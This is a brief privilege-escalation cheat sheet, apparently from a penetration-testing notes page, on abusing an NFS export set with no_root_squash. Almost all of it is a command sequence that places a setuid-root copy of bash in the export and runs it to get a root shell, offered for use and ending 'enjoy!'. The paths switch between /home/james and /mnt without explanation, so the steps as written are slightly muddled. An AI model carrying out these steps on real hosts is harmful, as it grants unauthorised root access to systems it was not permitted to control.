NFS no_root_squash

linux, privesc, nfs

Overview #

If an NFS export contains no_root_squash option, attacker can mount that export on his machine and modify any file acting as root user.

Steps #

# e.g /home/james is an NFS export
cd /home/james
cp /bin/bash .
cd /mnt
sudo chown root:root bash
sudo chmod u+s bash
./bash -p
# enjoy!